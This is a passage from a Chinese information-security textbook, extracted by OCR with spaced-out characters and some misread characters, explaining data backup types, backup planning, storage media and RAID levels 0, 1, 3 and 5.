忽略 了 。 取 回 原先 备份 的 文件 的 过 程 称 为 恢复 数据 。 

数据 备份 和 数据 压缩 从 信息 论 的 观点 上 来 看 是 完全 相反 的 两 个 概念 。 数 据 压缩 通过 减 
少数 据 的 元 余 度 来 减少 数据 在 存储 介质 上 所 占用 的 存储 空间 ,而 数据 备份 则 通过 增加 数据 
的 元 余 度 来 达到 保护 数据 安全 的 目的 。 

虽然 数据 备份 和 数据 压缩 在 信息 论 的 观点 上 互 不 相同 ,但 在 实际 应 用 中 却 常 常 将 它们 
结合 起 来 使 用 。 通 常 将 所 要 备份 的 数据 先进 行 压 缩 处 理 , 然 后 再 将 压缩 后 的 数据 用 备份 手 
段 进行 保护 。 当 原先 的 数据 失效 或 受 损 需要 恢复 数据 时 , 先 将 备份 数据 用 备份 手段 相对 应 
的 恢复 方法 进行 恢复 ,然后 再 将 恢复 后 的 数据 解压 缩 。 在 现代 计算 机 常用 的 备份 工具 中 , 绝 
大 多 数 都 结合 了 数据 压缩 和 数据 备份 技术 。 

2. 数据 备份 的 重要 性 


计算 机 中 的 数据 通常 是 非常 宝贵 的 。 下 面 的 一 组 数据 仅 就 文本 数据 的 输入 价值 (没有 
考虑 数据 本 身 的 重要 性 ) 来 说 明 数据 宝贵 这 一 观点 。 一 个 存储 容量 为 80MB 的 硬盘 可 以 存 
放大 约 28 000 页 用 键盘 输入 的 文本 。 如 果 这 些 文本 的 数据 都 丢失 了 将 意味 着 什么 呢 ? 按 
每 页 大 约 350 个 单词 计数 ,这 将 花费 一 个 打字 速度 很 快 的 打字 员 ( 每 分 钟 输入 75 个 单词 ) 
2177 个 小 时 来 重新 输入 这 些 文本 , 按 每 小 时 30 元 的 工资 计算 ,这 需要 65 310 元 。 备 份 
80MB 的 数据 在 现在 的 大 部 分 计算 机 系统 上 大 约 只 需要 5 分 钟 。 

计算 机 中 的 数据 是 非常 脆弱 的 ,在 计算 机 上 存放 重要 数据 如 同 大 象 在 薄 冰 上 行走 一 样 
不 安全 。 计 算 机 中 的 数据 每 天 经 受 着 许 许 多 多 不 利 因素 的 考验 ,计算 机 病毒 可 能 会 感染 计 
算 机 中 的 文件 ,并 吞噬 掉 文件 中 的 数据 。 安 放 计 算 机 的 机 房 , 可 能 因 不 正确 使 用 电 而 发 生火 
灾 , 也 有 可 能 因 水 龙头 漏水 导致 一 片 汪洋 ; 计算 机 还 可 能 遭 到 恶意 黑客 的 入侵 ,如 在 计算 机 
上 执行 Format( 格 式 化 ) 命 令 ; 计算 机 中 的 硬盘 由 于 是 半导体 器 件 还 可 能 被 磁化 而 不 能 正 
常 使 用 ; 还 有 可 能 由 于 被 不 太 熟 悉 计 算 机 的 人 误 操作 ,或 者 用 户 自己 的 误 操 作 而 丢失 重要 
数据 。 所 有 这 些 都 会 导致 数据 损坏 甚至 完全 丢失 。 

计算 机 中 可 能 有 一 些 私 人 信件 .重要 的 金融 信息 .通讯 录 、 文 档 \ 程 序 等 ,显然 ,这 些 数据 
中 的 任何 一 个 丢失 都 会 让 人 头痛 不 已 。 重 新 整理 这 些 数据 的 代价 是 非常 高 的 .有 时 甚至 是 
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不 可 能 完成 的 任务 ,所 以 一 定 要 将 重要 的 数据 进行 备份 。 

数据 备份 能 够 用 一 种 增加 数据 存储 代价 的 方法 保护 数据 的 安全 ,对 于 一 些 拥 有 重要 数 
据 的 大 公司 来 说 尤为 重要 。 很 难 想象 银行 的 计算 机 中 存放 的 数据 在 没有 备份 的 情况 下 丢失 
将 会 造成 什么 样 的 混乱 局 面 。 数 据 备份 能 在 较 短 的 时 间 内 用 很 小 的 代价 ,将 有 价值 的 数据 
存放 到 与 初始 创建 的 存储 位 置 相 异 的 地 方 ,在 数据 被 破坏 时 ,再 在 较 短 的 时 间 和 非常 小 的 代 
价 下 将 数据 全 部 恢复 或 部 分 恢复 。 

3. 优秀 备份 系统 应 满足 的 原则 

不 同 的 应 用 环境 要 求 不 同 的 解决 方案 来 适应 。 一 般 来 说 ,一 个 完善 的 备份 系统 需要 满 
足以 下 7 个 原则 。 

(1) 稳定 性 。 备 份 产品 的 主要 作用 是 为 系统 提供 一 个 数据 保护 的 方法 ,于 是 该 产品 本 
身 的 稳定 性 和 可 靠 性 就 变 成 了 最 重要 的 一 个 方面 。 首 先 ,备份 软件 一 定 要 与 操作 系统 
100% 兼 容 ; 其 次 , 当 事 故 发 生 时 ,能 够 快速 有效 地 恢复 数据 。 

(2) 全 面 性 。 在 复杂 的 计算 机 网 络 环境 中 ,可 能 会 包括 各 种 操作 平台 ,如 UNIX、 
Linux、Windows、Mac 等 ,并 安装 有 各 种 应 用 系统 ,如 ERP、 数 据 库 、 集 群 系统 等 。 选 用 的 备 
份 系统 ,要 支持 各 种 操作 系统 ,数据库 和 典型 应 用 。 

(3) 自动 化 。 很 多 单位 由 于 工作 性 质 , 对 何 时 备份 .用 多 长 时 间 备 份 都 有 一 定 的 规定 。 
在 下 班 时 间 , 系 统 负荷 轻 , 适 于 备份 ,可 是 这 会 增加 系统 管理 员 的 负担 ,由 于 精神 状态 等 原 
因 , 还 会 给 备份 安全 带 来 潜在 的 隐患 。 因 此 ,备份 方案 应 能 提供 定时 的 自动 备份 ,并 利用 磁 
带 库 等 技术 进行 自动 换 带 。 在 自动 备份 过 程 中 ,还 要 有 日 志 记 录 功 能 ,并 在 出 现 异常 情况 时 
自动 报警 。 

(4) 高 性 能 。 随 着 业务 的 不 断 发 展 , 数 据 越 来 越 多 ,更 新 越 来 越 快 ,在 休息 时 间 来 不 及 
备份 如 此 多 的 内 容 , 在 工作 时 间 备 份 又 会 影响 系统 性 能 。 这 就 要 求 在 设计 备份 时 ,尽量 考虑 
到 提高 数据 备份 的 速度 ,利用 多 个 磁带 机 并 行 操作 的 方法 。 

(5) 操作 简单 。 数 据 备份 应 用 于 不 同 领 域 ,进行 数据 备份 的 操作 人 员 也 处 于 不 同 的 层 
次 。 这 就 需要 一 个 直观 的 ,操作 简单 的 图 形 化 用 户 界面 ,缩短 操作 人 员 的 学 习 时 间 , 减 轻 操 
作 人 员 的 工作 压力 ,使 备份 工作 能 够 轻松 地 设置 和 完成 。 

(6) 实时 性 。 有 些 关键 性 的 任务 是 要 24 小 时 不 停机 运行 的 ,在 备份 时 ,有 一 些 文件 可 
能 仍然 处 于 打开 的 状态 ,那么 在 进行 备份 时 ,要 采取 措施 ,实时 查看 文件 大 小 ,进行 事务 跟 
踪 , 以 保证 正确 地 备份 系统 中 的 所 有 文件 。 

(7) 容错 性 。 数 据 是 备份 在 磁带 上 的 ,对 磁带 进行 保护 ,并 确认 备份 磁带 中 数据 的 可 靠 
性 ,这 也 是 一 个 至 关 重 要 的 方面 。 如 果 引 入 RAID 技术 ,对 磁带 进行 镜像 ,就 可 以 更 好 地 保 
证 数据 安全 可 靠 ,给 用 户 数据 再 加 一 把 保险 锁 。 

4. 数据 备份 的 种 类 

数据 备份 按照 备份 时 所 备份 数据 的 特点 可 以 分 为 3 种 : 完全 备份 \ 增 量 备 份 和 差分 
备份 。 

(1) 完全 备份 : 即 对 系统 中 全 部 需要 备份 的 数据 与 文件 做 备份 ,在 备份 系统 中 存放 的 
数据 是 最 新 的 。 完 全 备份 策略 的 优点 是 备份 与 恢复 的 操作 比较 简单 ,数据 恢复 所 需 的 时 间 
最 短 ,相对 来 说 也 最 为 可 靠 ; 其 缺点 在 于 需要 备份 的 数据 量 最 大 ,消耗 的 存储 空间 最 多 , 备 
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份 过程 也 最 慢 。 

(2) 增 量 备份 : 指 仅 对 上 一 次 备份 以 后 更 新 的 数据 做 备份 。 此 种 备份 策略 的 优点 是 每 
次 需要 备份 的 数据 量 小 ,消耗 存储 空间 小 ,备份 所 需 时 间 短 ; 其 缺点 首先 是 备份 与 恢复 的 操 
作 都 较为 复杂 ,备份 时 需要 区 分 哪些 数据 被 修改 过 ,恢复 时 首先 也 需要 一 次 完全 备份 作为 基 
础 ,然后 依照 一 次 次 的 增 量 备份 ,逐渐 将 系统 数据 恢复 到 最 后 一 次 备份 时 的 水 准 。 

(3) 差分 备份 : 指 备份 上 一 次 全 备份 以 来 更 新 的 所 有 数据 。 恢 复 时 需要 最 近 一 次 全 备 
份 数据 和 最 近 一 次 差分 备份 的 数据 即 可 。 此 种 备份 的 优 缺 点 介 于 全 备份 和 增 量 备份 之 间 。 

总 的 来 说 ,这 3 种 备份 分 别 适用 于 不 同情 况 的 应 用 场合 。 完 全 备份 最 适 于 日 常 更 新 大 、 
总 数据 量 不 大 的 情况 。 而 对 于 总 数据 量 很 大 .日 常 更 新 相对 小 的 系统 可 以 根据 情况 选择 增 
量 备份 或 差分 备份 。 例 如 ,每 隔 一 周 或 更 长 时 间 做 一 次 全 备份 ,每 隔 若干 小 时 或 一 天 做 一 次 
增 量 或 差分 备份 。 表 2-3 给 出 了 3 种 备份 方式 的 区 别 。 


表 2-3 3 种 备份 方式 比较 


备份 方式 占用 空间 备份 速度 恢复 速度 
完全 备份 最 多 最 慢 最 快 

增 量 备份 最 少 最 快 最 慢 

差分 备份 介 于 两 者 之 间 介 于 两 者 之 间 介 于 两 者 之 间 


一 般 在 使 用 过 程 中 ,这 3 种 备份 策略 常 结合 使 用 ,常用 的 方法 有 完全 备份 .完全 备份 十 
增 量 备份 .完全 备份 十 差分 备份 。 

(1) 完全 备份 会 产生 大 量 数 据 移动 ,选择 每 天 完全 备份 的 客户 经 常 直 接 把 磁带 介质 连 
接 到 每 台 计 算 机 上 (避免 通过 网 络 传输 数据 )。 其 结果 是 较 差 的 经 济 效益 和 较 高 的 人 力 
花费 。 

(2) 完全 备份 十 增 量 备份 源 自 完 全 备份 ,不 过 减少 了 数据 移动 ,其 思想 是 较 少 使 用 完全 
备份 。 例 如 ,在 周 六 晚上 进行 的 完全 备份 ,在 其 他 6 天 则 进行 增 量 备份 。 使 用 周 日 到 周 五 的 
增 量 备份 能 保证 只 移动 那些 在 最 近 24 小 时 内 改变 了 的 文件 ,而 不 是 所 有 文件 。 由 于 只 有 较 
少 的 数据 移动 和 存储 , 增 量 备份 减少 了 对 磁带 介质 的 需求 。 对 客户 来 讲 则 可 以 在 一 个 自动 
系统 中 应 用 更 加 集中 的 磁带 库 , 以 便 允 许多 个 客户 机 共享 昂贵 的 资源 。 

可 是 当 采 用 完全 备份 十 增 量 备份 这 种 方法 恢复 数据 时 ,完整 的 恢复 过 程 首先 需要 恢复 
上 周 六 晚 的 完全 备份 ,然后 再 覆盖 自 完全 备份 以 来 每 天 的 增 量 备份 。 该 过 程 最 坏 的 情况 是 
要 设置 7 个 磁带 集 (每 天 一 个 )。 如 果 文 件 每 天 都 改 , 则 需要 恢复 7 次 才能 得 到 最 新 状态 。 

(3) 完全 备份 十 差分 备份 方法 主要 考虑 完全 备份 十 增 量 备份 方法 中 恢复 很 困难 , 增 量 
备份 考虑 的 问题 是 自 昨 天 以 来 哪些 文件 改变 了 ,而 差分 备份 方法 考虑 的 问题 是 自 完全 备份 
以 来 哪些 文件 发 生 了 变化 。 在 完全 备份 后 进行 的 第 一 次 的 备份 后 ,由 于 完全 备份 就 在 昨天 ， 
采用 增 量 备份 和 差分 备份 两 种 备份 方法 所 得 到 的 结果 是 相同 的 。 但 到 了 以 后 的 备份 ,结果 
就 不 一 样 了 , 增 量 备份 进行 每 次 备份 后 的 数据 只 能 恢复 24 小 时 内 改变 的 文件 ,而 差分 备份 
可 以 在 每 次 备份 后 恢复 每 天 变化 的 文件 。 例 如 ,在 周 六 进行 一 次 完全 备份 后 ,到 了 周 日 则 备 
份 48 小 时 内 改变 了 的 文件 ,周二 则 备份 72 小 时 内 改变 了 的 文件 ,以 此 类 推 。 尽 管 差分 备份 
比 增 量 备份 移动 和 存储 更 多 的 数据 ,但 恢复 操作 比 采 用 增 量 备份 就 简单 多 了 。 
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5. 数据 备份 计划 

IT 专家 指出 ,对 于 重要 的 数据 来 说 ,有 一 个 清楚 的 数据 备份 计划 非常 重要 , 它 能 清楚 地 
显示 数据 备份 过 程 中 所 做 的 每 一 步 重要 工作 。 

数据 备份 计划 分 以 下 几 步 完成 。 

(1) 确定 数据 将 受到 的 安全 威胁 。 完 整 考察 整个 系统 所 处 的 物理 环境 和 软件 环境 ,分 
析 可 能 出 现 的 破坏 数据 的 因素 。 

(2) 确定 敏感 数据 。 对 系统 中 的 数据 进行 挑选 分 类 , 按 重要 性 和 潜在 的 遭受 破坏 的 可 
能 性 划分 等 级 。 

(3) 对 将 要 进行 备份 的 数据 进行 评估 。 确 定 初始 时 采用 不 同 的 备份 方式 (完整 备份 . 增 
量 备份 和 系统 备份 ) 备 份 数据 占据 存储 介质 的 容量 大 小 ,以 及 随 着 系统 的 运行 备份 数据 的 增 
长 情况 ,以 此 确定 将 要 采取 的 备份 方式 。 

(4) 确定 备份 所 采取 的 方式 及 工具 。 根 据 第 (3) 步 的 评估 结果 .数据 备份 的 财政 预算 和 
数据 的 重要 性 ,选择 一 种 备份 方式 和 备份 工具 。 

(5) 配备 相应 的 硬件 设备 ,实施 备份 工作 。 


2.3.2 备份 采用 的 存储 设备 


数据 的 备份 离 不 开 存 储 设备 ,在 计算 机 的 组 成 结构 中 ,有 一 个 很 重要 的 部 分 ,就 是 存储 
器 , 它 是 用 来 存储 程序 和 数据 的 部 件 。 对 于 计算 机 来 说 ,有 了 存储 器 就 有 了 记忆 功能 ,才能 
保证 正常 工作 。 存 储 器 分 为 内 存储 器 和 外 存储 器 ,而 备份 所 用 到 的 存储 器 则 是 外 存储 器 。 
随 着 计算 机 的 发 展 越 来 越 迅猛 ,存储 设备 也 越 来 越 先进 ,其 存储 容量 也 越 来 越 大 。 目 前 , 常 
用 的 外 存储 介质 主要 包括 优盘 、 硬 盘 、 磁 带 和 光盘 等 , 随 着 网 络 的 发 展 壮大 ,网 络 存储 已 成 为 
时 代 的 主流 。 

1. 优盘 备份 

优盘 是 近 几 年 来 使 用 较 多 的 移动 存储 设备 ,同样 也 是 一 种 不 错 的 备份 设备 。 它 有 众多 
特点 ,如 体积 小 、 价 格 便宜 、 重 量 轻 \ 读 写 速 度 快 .无 须 外 接 电源 、 可 热 插 拔 、 携 带 简单 方便 等 ， 
不 仅 可 在 台式 计算 机 、 笔 记 本 电脑 ,苹果 电脑 之 间 跨 平台 使 用 ,还 可 在 不 同 的 数码 设备 与 计 
算 机 间 传 输 、 存 储 各 类 数据 文件 ,在 保存 数据 的 安全 性 上 也 表现 得 非常 出 色 , 并 且 有 些 优盘 
本 身 还 带 有 加 密 功 能 ,是 普通 用 户 备份 数据 的 较 佳 存储 设备 。 

2. 磁带 备份 

从 许多 角度 上 看 ,磁带 备份 还 是 比较 合适 的 数据 备份 方法 。 磁 带 备份 的 优点 如 下 。 

(1) 容量 。 硬 盘 的 容量 越 来 越 大 ,磁带 可 能 是 唯一 的 和 最 经 济 的 能 够 容纳 下 硬盘 所 有 
数据 的 存储 介质 。 

(2) 费用 。 无 论 是 磁带 驱动 器 还 是 能 存放 数据 的 磁带 ,其 价格 都 还 稍 显 昂贵 。 个 人 计 
算 机 用 户 最 少 要 花费 上 千 元 来 适当 地 、 可 靠 地 备份 若干 吉 字 节 的 数据 。 

(3) 可 靠 性 。 在 正确 维护 磁带 驱动 器 和 小 心 保 管 磁带 的 前 提 下 ,磁带 备份 一 般 情况 下 
还 是 比较 可 靠 的 。 

(4) 简单 性 和 通用 性 。 现 在 有 许多 磁带 驱动 器 ,同时 也 有 各 种 各 样 的 软件 产品 ,软件 产 
品 很 好 地 支持 了 硬件 产品 使 安装 和 使 用 磁带 设备 非常 简单 。 不 同 磁带 驱动 器 之 间 的 兼容 
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性 也 很 好 ,它们 大 多 数 都 遵循 一 定 的 国际 标准 。 

当然 ,磁带 备份 离 完美 的 备份 相差 还 是 很 远 的 。 价 格 较 贵 一 点 的 和 价格 较 低 一 点 的 磁 
带 驱 动 器 在 可 靠 性 上 差别 很 大 。 在 许多 情况 下 ,磁带 备份 的 性 能 也 不 是 很 卓越 ,尤其 是 要 随 
机 存 取 磁 带 上 的 某 个 特定 文件 时 (磁带 在 顺序 存 取 时 工作 得 很 好 ) 。 现 在 , 像 DLT 这 样 的 
高 端 磁带 驱动 器 实际 上 已 经 有 了 非常 好 的 性 能 ,但 价格 不 菲 。 

3. 光盘 备份 

(1) 一 次 性 可 刻录 光盘 驱动 器 (CD Recordable,CD-R)。 这 些 只 能 写 一 次 ,可 以 读 多 次 
的 光盘 的 容量 大 约 为 650MB。 尽 管 光盘 不 能 重复 刻录 ,许多 人 还 是 用 它 来 备份 ,因为 空 的 
可 刻录 光盘 的 价格 非常 低 。 可 刻录 光盘 有 一 个 很 大 的 优点 就 是 备份 数据 可 以 用 普通 的 光盘 
驱动 器 来 读 取 。 但 是 并 不 建议 用 这 种 方式 来 备份 数据 ,原因 在 于 随 着 数据 量 的 增长 ,存储 介 
质 的 成 本 会 越 来 越 高 。 

(2) 可 重复 刻录 光盘 驱动 器 (CD ReWriteable,CD-RW)。 与 移动 等 价 硬盘 驱动 器 非常 
相似 。CD-RW 有 许多 把 它 作 为 常用 存储 媒介 的 理由 , 它 的 灵活 性 非常 好 ,可 以 在 刻录 机 上 
刻录 ,然后 在 光盘 驱动 器 或 播放 音乐 的 CD 机 上 读 取 ,但 是 并 不 建议 把 它 作为 严格 的 备份 
介质 。 

4. 可 移动 硬盘 备份 

在 存储 领域 数据 安全 是 一 个 永恒 的 话题 ,尤其 对 于 经 常 随身 携带 的 移动 存储 来 说 更 为 
重要 。 对 绝 大 多 数 用 户 来 说 ,移动 硬盘 中 存储 的 数据 价值 已 经 远 远 高 于 产品 的 价格 ,因此 ， 
作为 随身 数据 存储 的 必要 设备 ,要 求 移动 硬盘 不 仅 要 具有 防 摔 、 抗 震 等 强大 的 物理 安全 性 
能 ,同时 还 需要 具备 数据 加 密 、 防 护 备份 等 多 方面 数据 安全 功能 。 因 此 ,虽然 价格 较 高 ,选择 
具备 数据 安全 性 能 的 原装 移动 硬盘 还 是 非常 值得 的 。 对 于 经 常 需要 进行 大 容量 数据 随身 存 
储 的 用 户 来 说 ,一 款 便于 携带 且 具 有 海量 数据 存储 功能 的 移动 硬盘 绝对 是 最 佳 选 择 。 移 动 
硬盘 有 以 下 几 个 特点 。 

(1) 容量 大 。 移 动 硬盘 容量 一 般 几 百 吉 字 节 至 几 太 字 节 ,非常 适合 需要 携带 大 型 的 图 
库 、 数 据 库 、 软 件 库 的 用 户 需要 。 

(2) 兼容 性 好 , 即 插 即 用 。 移 动 硬盘 采用 了 计算 机 外 设 产品 的 主流 接口 USB 接口 , 通 
过 USB 线 或 1394 连 线 轻松 与 计算 机 联系 ,十 分 方便 。 

(3) 速度 快 。 移 动 硬盘 大 多 采用 USB、IEEE 1394、ESATA 接口 。USB 2. 0 接口 传输 
速率 是 60Mb/s,USB 3. 0 接口 传输 速率 可 达 625Mb/s, IEEE1394 接口 的 传输 速率 是 50 一 
100Mb/s, 当 与 主机 交换 数据 时 ,保存 1GB 的 文件 只 需要 几 分 钟 就 可 轻松 完成 ,特别 适合 视 
频 和 音频 数据 的 数据 交换 , 远 胜 于 其 他 移动 存储 设备 。 

5. 本 机 多 硬盘 备份 

对 于 那些 在 自己 的 计算 机 中 有 多 块 硬盘 的 用 户 来 说 ,一 种 备份 解决 方案 是 用 其 中 的 一 
块 或 多 块 运行 操作 系统 和 应 用 程序 ,再 用 剩余 的 其 他 硬盘 来 备份 。 硬 盘 和 硬盘 之 间 的 数据 
复制 既 可 以 用 文件 复制 工具 来 实现 ,也 可 以 用 磁盘 复制 工具 来 实现 。 本 机 多 硬盘 备份 在 许 
多 情形 下 工作 得 很 好 ,当然 它 也 有 一 些 限制 。 其 优点 在 于 使 用 简便 ,可 配置 为 自动 完成 备份 
工作 。 磁 盘 到 磁盘 的 复制 性 能 非常 高 ,相应 的 费用 却 很 低 。 

本 机 硬盘 备份 的 缺点 也 是 非常 致命 的 。 首先, 它 不 能 保护 硬盘 上 的 数据 遭受 很 多 方面 
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的 威胁 ,如 火灾 、 小 偷 .计算 机 病毒 等 ; 其 次 ,用 本 机 硬盘 备份 只 能 有 一 个 备份 数据 ,这 使 得 
整个 系统 很 脆弱 。 

总 之 ,不 建议 用 本 机 硬盘 备份 作为 唯一 的 备份 手段 。 最 好 的 解决 方法 是 它 与 一 种 可 移 
动 备份 方法 结合 起 来 使 用 。 

6. 网 络 备 份 

对 于 处 在 网 络 中 的 计算 机 系统 来 说 ,网 络 备份 是 可 移动 备份 方法 的 一 个 很 好 替代 。 这 
种 备份 方法 常用 来 给 没有 磁带 驱动 器 和 其 他 可 移动 备份 介质 的 中 小 型 计算 机 做 备份 。 网 络 
备份 的 思路 很 简单 :把 计算 机 系统 中 的 数据 复制 到 处 在 网 络 中 的 另外 一 台 计 算 机 中 。 

在 复制 数据 时 ,网 络 备份 与 本 机 多 硬盘 备份 非常 相似 ,使 用 一 样 简单 ,一 样 能 配置 成 自 
动 执 行 备份 任务 。 然 而 ,依赖 于 各 个 计算 机 在 实际 中 的 位 置 ,小 偷 、 自 然 灾害 等 仍然 是 个 大 
问题 。 还 要 注意 的 一 点 是 ,计算 机 病毒 也 能 在 网 络 上 传播 。 

网 络 备份 在 许多 企业 环境 中 的 使 用 越 来 越 多 。 企 业 通常 用 一 种 集中 的 可 移动 存储 设备 
作为 备份 介质 ,自动 地 备份 整个 网 络 中 的 数据 。 网 络 备份 的 缺点 是 备份 时 给 网 络 造 成 的 拥 
挤 现 象 非常 严重 ,而 且 备 份 数 据 所 需 花 费 的 时 间 过 分 依赖 于 网 络 的 传输 速度 。 


2.3.3 磁盘 阵列 (RAID) 技 术 简介 


RAID 技术 是 由 美国 加 州 大 学 伯克利 分 校 的 Patterson 教授 在 1988 年 提出 的 。RAID 
(Redundant Array of Inexpensive Disks) 译 为 “廉价 宛 余 磁盘 阵列 ”, 也 称 为 “磁盘 阵列 ”。 后 
来 RAID 中 字母 I 的 含义 被 改 为 Independent,RAID 就 成 了 “独立 元 余 磁 盘 阵 列 ”, 但 这 只 是 
名 称 的 变化 ,实质 性 的 内 容 并 没有 改变 。RAID 技术 是 利用 若干 台 小 型 硬 磁盘 驱动 器 加 上 
控制 器 按 一 定 的 组 合 条 件 而 组 成 的 一 个 大 容量 ,快速 响应 .高 可 靠 的 存储 子 系统 。 

不 仅 由 于 有 多 台 驱 动 器 并 行 工 作 , 大 大 提高 了 存储 容量 和 数据 传输 率 ,而 且 还 由 于 采用 
了 纠 错 技术 ,提高 了 可 靠 性 。RAID 按 工作 模式 可 以 分 为 RAID 0、RAID 1、RAID 2、RAID 3、 
RAID 4、RAID 5、RAID 6、RAID 7、RAID 10、RAID 53 等 级 别 ,这 里 只 介绍 常用 的 几 个 
RAID 级 别 。 

1. RAIDO 

RAID 0 为 无 元 余 、 无 校 验 的 磁盘 阵列 。 它 至 少 使 用 两 个 磁盘 驱动 器 ,并 将 数据 分 成 从 
512B 到 数 兆 字 节 的 若干 块 (数据 条 带 ) ,这 些 数据 块 被 交替 写 到 磁盘 中 。 第 1 段 被 写 到 磁盘 
1 中 ,第 2 段 被 写 到 磁盘 2 中 等 。 当 系统 到 达 阵 列 中 的 最 后 一 个 磁盘 时 ,就 写 到 磁盘 1 的 下 
一 分 段 ,以 此 类 推 。 分割 数 据 将 1/O 负载 平均 分 配 到 所 有 的 驱动 器 。 由 于 驱动 器 可 以 同时 
写 或 读 ,因此 性 能 得 以 显著 提高 。 但 是 , 它 却 没有 数据 保护 能 力 ,如 果 一 个 磁盘 出 故障 ,数据 
就 会 丢失 。RAID 0 不 适用 于 对 可 靠 性 要 求 高 的 关键 任务 环境 ,但 却 适用 于 对 性 能 要 求 较 
高 的 视频 或 图 像 编辑 。 

2. RAID 1 

RAID 1 为 镜像 磁盘 阵列 。 每 一 个 磁盘 驱动 器 都 有 一 个 镜像 磁盘 驱动 器 ,镜像 磁盘 驱 
动 器 随时 保持 与 原 磁 盘 驱动 器 的 内 容 一 致 。RAID 1 具有 较 高 的 安全 性 ,但 只 有 一 半 的 磁 
盘 空 间 被 用 来 存储 数据 。 为 了 实时 保持 镜像 磁盘 数据 的 一 致 性 ,RAID 1 磁盘 控制 器 的 负 
载 相 当 大 ,在 此 性 能 上 没有 提高 。RAID 1 主要 用 在 对 数据 安全 性 要 求 很 高 ,而 且 要 求 能 够 
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快速 恢复 被 损坏 的 数据 的 场合 。 
3. RAID 3 


RAID 3 为 带 奇 偶 校 验 码 的 并 行 传送 。 它 使 用 一 个 专门 的 磁盘 存放 所 有 的 校 验 数据 ， 
而 在 剩余 的 磁盘 中 创建 带 区 集 分 散 数据 的 读 写 操作 。 当 从 一 个 完好 的 RAID 3 系统 中 读 取 
数据 时 ,只 需要 在 数据 存储 盘 中 找到 相应 的 数据 块 进行 读 取 操 作 即 可 。 但 当 向 RAID 3 写 
入 数据 时 ,必须 计算 与 该 数据 块 同 处 一 个 带 区 的 所 有 数据 块 的 校 验 值 , 并 将 校 验 值 重 新 写 入 
到 校 验 块 中 ,无 形 中 增加 了 系统 开销 。 

当 一 块 磁盘 失效 时 ,该 磁盘 上 的 所 有 数据 块 必须 使 用 校 验 信息 重新 建立 ,如 果 所 要 读 取 
的 数据 块 正好 位 于 已 经 损坏 的 磁盘 处 , 则 必须 同时 读 取 同一 带 区 中 的 所 有 其 他 数据 块 ,并 根 
据 校 验 值 重 建 丢 失 的 数据 ,这 样 会 使 系统 速度 减 慢 。RAID 3 最 大 的 不 足 是 校 验 盘 很 容易 
成 为 整个 系统 的 瓶 颂 ,对 于 经 常 有 大 量 写 人 操作 的 应 用 会 导致 整个 RAID 系统 性 能 的 下 降 。 
RAID 3 适合 用 于 数据 密集 型 环境 或 单一 用 户 环 境 ,尤其 有 益 于 要 访问 较 长 的 连续 记录 ,如 
数据 库 和 Web 服务 器 等 。 

4. RAID 5 


RAID 5 为 无 独立 校 验 盘 的 奇偶 校 验 磁盘 阵列 。RAID 5 把 校 验 块 分 散 到 所 有 的 数据 
盘 中 , 它 使 用 了 一 种 特殊 的 算法 ,可 以 计算 出 任何 一 个 带 区 校 验 块 的 存放 位 置 ,这 样 就 可 以 
确保 任何 对 校 验 块 进行 的 读 写 操作 都 会 在 所 有 的 RAID 磁盘 中 进行 均衡 ,从 而 消除 了 产生 
瓶颈 的 可 能 。RAID 5 能 提供 较为 完美 的 整体 性 能 ,因而 也 是 被 广泛 应 用 的 一 种 磁盘 阵列 
方案 。 它 适合 于 1/O 密集 、 高 读 / 写 比率 的 应 用 程序 ,如 事务 处 理 等 。 为 了 具有 RAID 5 级 
的 元 余 度 , 至 少 需 要 3 个 磁盘 组 成 的 磁盘 阵列 。RAID 5 既 可 以 通过 磁盘 阵列 控制 器 硬件 实 
现 , 也 可 以 通过 某 些 网 络 操作 系统 软件 实现 。 

从 RAID 1 一 5 的 几 种 方案 中 ,不 论 何 时 有 磁盘 损坏 ,都 可 以 随时 拔 出 损坏 的 磁盘 再 插 
和 好 的 磁盘 (需要 硬件 上 的 热 插 拔 支持 ) ,数据 不 会 受 损 , 失 效 盘 的 内 容 可 以 很 快 重建 ,重建 
的 工作 也 由 RAID 硬件 或 RAID 软件 来 完成 。 但 RAID 0 不 提供 错误 校 验 功 能 ,所 以 有 人 
说 它 不 能 算 作 是 RAID, 其 实 这 也 是 RAID 0 为 什么 被 称 为 0 级 RAID 的 原因 (0 本 身 就 代 
表 “ 没 有 ”) 。 以 上 介绍 的 RAID 级 别 性 能 比较 如 表 2-4 所 示 。 


表 2-4 常用 的 RAID 级 别 的 特征 


特征 RAID 0 RAID 1 RAID 3 RAID 5 
容错 性 无 有 有 有 
元 余 类 型 无 复制 奇偶 校 验 奇偶 校 验 
热 备份 选择 无 有 有 有 
硬盘 要 求 一 个 或 多 个 偶数 个 至 少 3 个 至 少 3 个 


有 效 硬 盘 容 量 。 全 部 硬盘 容量 ”硬盘 容量 的 50% ”硬盘 容量 的 (n 一 1)/n 硬盘 容量 的 (n 一 1)/n 


对 于 当前 的 PC, 整 个 系统 的 速度 瓶颈 主要 是 硬盘 。 在 PC 中 ,磁盘 速度 慢 一 些 并 不 是 
太 严 重 的 事情 。 但 在 服务 器 中 ,这 是 不 允许 的 ,服务 器 必须 能 响应 来 自 四 面 八 方 的 服务 请 
求 , 这 些 请 求 大 多 与 磁盘 上 的 数据 有 关 ,所 以 服务 器 的 磁盘 子 系统 必须 要 有 很 高 的 输入 / 输 
出 速率 。 为 了 数据 的 安全 ,RAID 还 要 有 一 定 的 容错 功能 , 它 提供 的 容错 功能 是 自动 实现 的 
(由 RAID 硬件 或 是 RAID 软件 来 做 ) , 它 对 应 用 程序 是 透明 的 , 即 无 须 应 用 程序 为 容错 做 任 
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何 工作 。RAID 提供 了 这 些 功能 ,所 以 它 被 广泛 地 应 用 在 服务 器 体系 中 。 

要 得 到 最 高 的 安全 性 和 最 快 的 恢复 速度 ,可 以 使 用 RAID 1; 要 在 容量 、 容 错 和 性 能 上 
取 折 中 可 以 使 用 RAID 5。 在 大 多 数 数据 库 服 务 器 中 ,操作 系统 和 数据 库 管理 系统 所 在 的 磁 
盘 驱 动 器 是 RAID 1, 但 数据 库 的 数据 文件 存放 于 RAID 5 的 磁盘 驱动 器 上 。 


本 章 小 结 


(1) 物理 安全 是 针对 计算 机 网 络 系统 的 硬件 设施 来 说 的 , 既 包 括 计算 机 网 络 设备 、 设 
施 、 环 境 等 存在 的 安全 威胁 ,也 包括 在 物理 介质 上 数据 存储 和 传输 存在 的 安全 问题 。 物 理 安 
全 是 计算 机 网 络 系统 安全 的 基本 保障 ,是 信息 安全 的 基础 。 

(2) 环境 安全 是 指 对 系统 所 在 环境 (如 设备 的 运行 环境 需要 适当 的 温度 ,湿度 ,尽量 少 
